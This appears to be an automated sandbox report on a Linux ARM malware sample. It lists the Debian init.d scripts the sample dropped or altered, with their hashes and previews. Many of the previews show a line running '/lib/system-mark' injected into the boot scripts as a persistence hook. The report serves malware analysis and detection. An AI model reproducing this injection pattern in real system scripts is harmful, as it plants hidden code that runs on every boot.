Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 914
Entropy (8bit): 5.158660421998386
Encrypted: false
SSDEEP: 12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrPcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CeKYZkVyKDvjQ
MD5: 905C0E1E5CC6FFC62CA21752E3F1753E
SHA1: 8810356FC23199F23631A7656815A431E34C4C1A
SHA-256: 6418AB31DBC9A1222A89C3D896C534373D9CB2D8D5D42FC75699889979E0AC34
SHA-512: C7735CFB23C6CC924E7B55D825F352EBFB86CAEA48DF358499EF294EBE82F49F325F3C1098AA717BA622A8545E9A116C2648B44E2066597C5D4A37E71E6F77F8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks-early {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2856
                                                                          Entropy (8bit):5.2245818519394565
                                                                          Encrypted:false
                                                                          SSDEEP:48:76MLNMwmbAzAZVCoLqLVO1Z6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/F1RetsJ:7BWwmEMZVChFB7UoAaZUoGDvuG/UoGr/
                                                                          MD5:A13A7862BD0038FC523BFDFD69743E21
                                                                          SHA1:02BDC079157F4E2DF13C4CD4EF92BF477512348E
                                                                          SHA-256:0B82721F8B1FA32F5D25FE373FCD6DC540296675AFAD5C04A0EA18C4855DF29D
                                                                          SHA-512:4856AEFE6C5516CD19438DAD4689B3D656BA0ACFD0E498ABDA54628E1287B2C9C340040799C5B8AE68DA67970E19B41264E0F7C0416108E53D6477F5F18C7AC9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON || exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1979
                                                                          Entropy (8bit):5.144887658077899
                                                                          Encrypted:false
                                                                          SSDEEP:48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFS2b:7j3FpjhnV5upSYuv3ScJQ2b
                                                                          MD5:B6B52BC4EBC4D496D01B30E2CFCF2C62
                                                                          SHA1:0221F156258ED821216CBF81280EE6324BDD52E9
                                                                          SHA-256:62B6CC632C9AC071EF72CDEB7057A4B20B7AE17413A289AEC43A67162B20A989
                                                                          SHA-512:B6FD6007E039984D1E505A62C76BB3373F3AF4A4DCB7E1AB7E2DF5C66D9D2F87DEB3DE2DEE97DF8FC33E9F94975B64DF03049C4DF60A1F02FADF4D5A7F6D4ED8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, Unicode text, UTF-8 text executable
                                                                          Category:dropped
                                                                          Size (bytes):3255
                                                                          Entropy (8bit):5.118926067111819
                                                                          Encrypted:false
                                                                          SSDEEP:96:9JOxbyAn/JNsQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jw2U1MSIr7nXmL
                                                                          MD5:B05B34CA2A32E2007677F6CD40C3AF66
                                                                          SHA1:48F6C6EC5AE325D1E72224E27E98DE1CF817C521
                                                                          SHA-256:6C0251B0D84D116413A6DEF3B4D1699017BE1114E025B5E7E4B546237209574E
                                                                          SHA-512:692CE95159E6677954A6E573ADCDC5BFF11301E37CF25501F7205164CC2F4D24B6758663BE5ABD680EEC2E22C08AA491CEC269DDB696AC2D4EF99798CBC30495
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -*- coding: utf-8 -*-.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system-mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3102
                                                                          Entropy (8bit):5.042976496573067
                                                                          Encrypted:false
                                                                          SSDEEP:48:78unF1gLpxNlduwTebFGBzB4ndfPaMa59zqKN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1XV3B2dUdaVAGvoe2Wtc
                                                                          MD5:34C249DFA3336DB31FBE66E1CD5758F6
                                                                          SHA1:4B86122506102F1A88F72FF6D83C8E32B88F9D1E
                                                                          SHA-256:EE131550054FD4C8053F1C139C7F96CDBA8FD3F7CCFA78C1ED87DDD4FFC10D47
                                                                          SHA-512:B88FE306642B0757B24110D43BFF4A286D24C1995C0E6C3E9429E85E51D9D9DD4150BB4F99F818EDBC3CF2AFB2F9CE30CB1E7928B15CF8D41ADC330D3F0C58F3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON || exit 0..if [ -r /etc/default/locale ]; then./lib/system-mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3163
                                                                          Entropy (8bit):5.259424339682965
                                                                          Encrypted:false
                                                                          SSDEEP:48:ietQlU+vdYb5tM7yL7yi47yIrrF9o6YRK50JDRABzNJuhCv8Z//UZJ7iuh052m3s:FtQlTd65tp6iN0oLRsQaAsUkho2mc
                                                                          MD5:78C631FF42D0225229009886F9999B56
                                                                          SHA1:4FAEF5CD07FC43C3AE00A1D09116580664EB9158
                                                                          SHA-256:0EA1C7D35BA69FB47D9AF56AA7FEEA00CC2F0A0F1ACB5796C48D4BB95F980D9E
                                                                          SHA-512:DF5DE7A268F0FFB5C6E95A32128877AAB05EA46331471D95E97DD4A31B883D0B9DE9005EC995F37AA254BEFE27A252961FF37148BB3E7896E30373FC16F96D84
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3946
                                                                          Entropy (8bit):5.1522498878727045
                                                                          Encrypted:false
                                                                          SSDEEP:96:uYqy3be4txLsMwqTZL5FFTUaTfNvagXQwjdjNvaYXDkeQz:VZbxtXFZNZTfNvawxjNva4e
                                                                          MD5:40E4F04E723FB5BEE6DF2327EA35254D
                                                                          SHA1:D512EAB734F222022E210CCA19128E992691CF78
                                                                          SHA-256:EEC4726C42AA93DEB9D6228BD464ED33FB6C1FF6FFD88ECC14C603746A7C444A
                                                                          SHA-512:71D245EA40A64FDCCAAA88D869F8E929F5FA9736FB16D7079CE41184CA9DA71F40E2E6EFED8382C4350089932AAC8C588271F72FB9E5139E35FF504C65127227
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2707
                                                                          Entropy (8bit):4.995870971917478
                                                                          Encrypted:false
                                                                          SSDEEP:48:92ZPnWGmH6TMV5m11QU7BXCW3gxxsXuHtpyBMbtKxxsDKV/BkH5:92Z/WbZnm11LByWwxKXuHtcBMbtKxKDr
                                                                          MD5:E666B216857A200A89A8C38279974070
                                                                          SHA1:5184B1942742E7D4811A8BA0080BD19413306EB5
                                                                          SHA-256:3A9EF64FD98E3991ABEE18FE69ED507EE8516B5777E7B3E8BB3BC69AE997D1F8
                                                                          SHA-512:A2BC047C6034F8594B640DD5A7746AAD3F6BEAC9239AA71C00C90EB19FF37FAD38B08A5ACC0B8E1928CC447450C0A69E3FB4C8A6EF65EC584227F0E8ACF1F3D2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON || exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1555
                                                                          Entropy (8bit):4.972539518025109
                                                                          Encrypted:false
                                                                          SSDEEP:24:2Ex/YpMr8MICUV7OlfrDNhay+HNCNIlH3U8lrQ5l8u4uuCG:/puMAMICu7OlN+UIlH3U8lc/ZWCG
                                                                          MD5:ECC4B12F805560CED916AF27BF8423D1
                                                                          SHA1:A5954BF38D2E34AE23286D676FE6E4153CDBFF69
                                                                          SHA-256:C33D4A5025DB90ACA69F23F041F2AFB4B31F1016DF03631C6D918A4EF5E6842D
                                                                          SHA-512:CFAC2CC9451D012F8A4DACFFC6ACA4C9456FF4F0D212C419443C0939CEB0AFE1DAE59329D9F9D27413A9E6CF2E0D05775C873AE53C355C0A8A738DB07120CAD3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1548
                                                                          Entropy (8bit):4.309956240738216
                                                                          Encrypted:false
                                                                          SSDEEP:48:9XfgD1yQyKzYcg/LshTJckS5MJAb8kGh5A9b6:9YQLH/w5SO
                                                                          MD5:89A7217DCF2B72ACC044B81A9CC3FC6F
                                                                          SHA1:E4E5E503268D650B4F0FE7C37DC0BD3EFA1CABC6
                                                                          SHA-256:896A6EAFC64047CB19D6319915BD349FD3B90A8BECA8A83AB2153EEC519A59E5
                                                                          SHA-512:8E6B76171B23133C44AB7CF19DCCCE87FD0AA38F4BC0520AB6F2AFA64CA506D447C192F0B09A8584D9C2203F665E89D8D33B3EA30E53681F5BA62A1DABC1DBC6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2164
                                                                          Entropy (8bit):4.907145181173842
                                                                          Encrypted:false
                                                                          SSDEEP:24:+mUxLADBzBQYDMAKjqg3Ulfb4MZC/tCYJGMsMHwDa1kig/ue5NrGgbcl8d:l/dtQYxKjRQfbO/oYJbJQAki6jzz
                                                                          MD5:0B192EEF5B7E6AE9C89B8E127943E04C
                                                                          SHA1:6F6B5F63D1F504524C5C27849353255A6EDEA52E
                                                                          SHA-256:D43E4D15B82D9D85BEF6B2B676506AED1B7FC3C50232BFB7BFE1D0202C83DCA3
                                                                          SHA-512:860ACA2D19758EAA6FD8C3D0552674842916C4F853A6739932A9E66B68582E5359AD91EE4F27443992ACCA380BFC33C2178BCAA21B93A812916CB228B831BA82
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] || exit 0.[ -x /sbin/modprobe ] || exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop|restart|reload|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_action_msg "Loading kernel module $module". modprobe $module $args || true. else. modprobe $module $args > /dev/null 2>&1 || t
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3534
                                                                          Entropy (8bit):5.282612583353571
                                                                          Encrypted:false
                                                                          SSDEEP:48:fbmo8vyUjH3J+cNrWId4KF9wDeXxr/FI/F7R7cJ0IB6rd/g1ZsbHaXAZ4td/WzvA:d8z3J+cNiR4SzGmJHyRDuHTWld
                                                                          MD5:E6E338C277324717A5722E4EA56AA2EE
                                                                          SHA1:46334BCB354D10D0AAC47F4D542710B66D446A77
                                                                          SHA-256:5BF68D24F74EC03AE3E2D53B8F57E51C8C3CB320FE53E5D6C8F3214E25EE9C29
                                                                          SHA-512:19AF2485DB58640CFEA8E245A4E1E57624239C12B961C7218B5B50FB880985D4275862F0F8FA805D004314844B791E8F2FE248A7797FF4D5082A892E34126DE9
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):901
                                                                          Entropy (8bit):5.1022129052660485
                                                                          Encrypted:false
                                                                          SSDEEP:12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsFoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/IwfJ2Hjq13O
                                                                          MD5:46FB137F6F75999F794FDB149BCAD53B
                                                                          SHA1:90F88FB0972A25A2BBEA62DB26EA84ED9CFC036D
                                                                          SHA-256:D661181FDD70CE80EF52393D7A58D33009CAE7ED2EB62C764C4CAC0181DD7E76
                                                                          SHA-512:C360EB8E5FD3E7A7740D6AE395DB430811306C176C9E3FEA975E76B6474533A30F709155A81F007E29DC61AE2200445CCD79F08139998BA575115F7CE45340CC
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM || exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system-mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start|stop|restart|force-reload|status}"..exit 1.esac..exit 0..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):604
                                                                          Entropy (8bit):5.314197695143652
                                                                          Encrypted:false
                                                                          SSDEEP:12:wdRDNeBuYrBMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Ex/lti9OXylj/
                                                                          MD5:273FB590FE7F5DAE000DC871BC5418DB
                                                                          SHA1:90575E32A398270FC2D10448A454646B84F3B257
                                                                          SHA-256:D9EDBDDD0D0151FDC741B4C0B8F6910DC01D9A6F2F2CBE5705297E4B27EE9C0F
                                                                          SHA-512:62B1896678941476EF1DF756AC16B136F0FDB1E86A53A8DC17340BDF03504BC7C54A8E04807B692A9F15A7904CE6E0087D3F6373C2CF1F6807444B36E45ABDCB
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2518
                                                                          Entropy (8bit):5.325203715837751
                                                                          Encrypted:false
                                                                          SSDEEP:48:7HvaUX9Q3esRt33P4AWNr/42Fwk0qmA40O4pTjmCjVwUH:7PaUX0eSt3/VczgWBbjmCjVwS
                                                                          MD5:0DBC33D8B96CA2A841D1A83960BDF389
                                                                          SHA1:BDC86C7897C467A42075B2C80A1CAEDCCA794F76
                                                                          SHA-256:631AD4D36C691EBC1AADD6006C597B64A69F4AF1F6AA2455A8F4F2563F11F13D
                                                                          SHA-512:F6320E3BD73BC5AFFD6C3D13832F836CE81323C0A059D26C9294A65C3DA7B3A394BC5A20C6B07244F48499BB5B8E3A7869A7E48FAF916CEABC495B8D281BDB8F
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON || exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system-mark. exit 0.fi..if [ ! -e $MO
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2964
                                                                          Entropy (8bit):5.31314714541473
                                                                          Encrypted:false
                                                                          SSDEEP:48:7HUksR9JrtNCDCJ99TaPn1PCDCJ99TafOBUV1kqH2fQuzfg61U149eh7KKSKMs:7HUkwbrSDu+Pn1qDu+2qV1RHSQuzA4I5
                                                                          MD5:54E61FBA1E794A3A95B4FA31099CEB2F
                                                                          SHA1:4036B83019BAE7A2D843C13C52AA91A86C4D4CA4
                                                                          SHA-256:BAEC2D4F6968AE735457DE716EB7E880C03C410A53A1C19563C258D78852874E
                                                                          SHA-512:6AC88EF6CDE8A2D98ED14A879CEDD04B263F252C0A03E93FBF5F6B50AF5416BDD3BAC231E43C98BA5DF0043703D67F1852D9159672B43D5D5EC0EC61BA431688
                                                                          Malicious:true
